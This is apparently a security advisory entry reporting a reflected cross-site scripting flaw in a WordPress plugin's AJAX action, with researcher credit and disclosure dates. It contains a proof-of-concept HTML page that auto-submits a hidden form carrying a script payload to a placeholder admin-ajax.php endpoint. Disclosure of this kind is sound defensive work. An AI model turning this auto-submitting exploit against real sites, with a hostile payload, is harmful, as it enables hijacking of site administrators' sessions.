The plugin does not sanitise and escape POSted parameters sent to the wpassetcleanup_fetch_active_plugins_icons AJAX action (available to admin users), leading to a Reflected Cross-Site Scripting issue
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST"> <input type="hidden" name="action" value="wpassetcleanup_fetch_active_plugins_icons" /> <input type="hidden" name="xxx" value="<script>alert(/XSS/)</script>" /> <input type="submit" value="Submit request" /> </form> </body> <script> var form1 = document.getElementById('hack'); form1.submit(); </script> </html>
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2022-01-03 (about 1 years ago)
2022-01-03 (about 1 years ago)
2022-09-26 (about 12 months ago)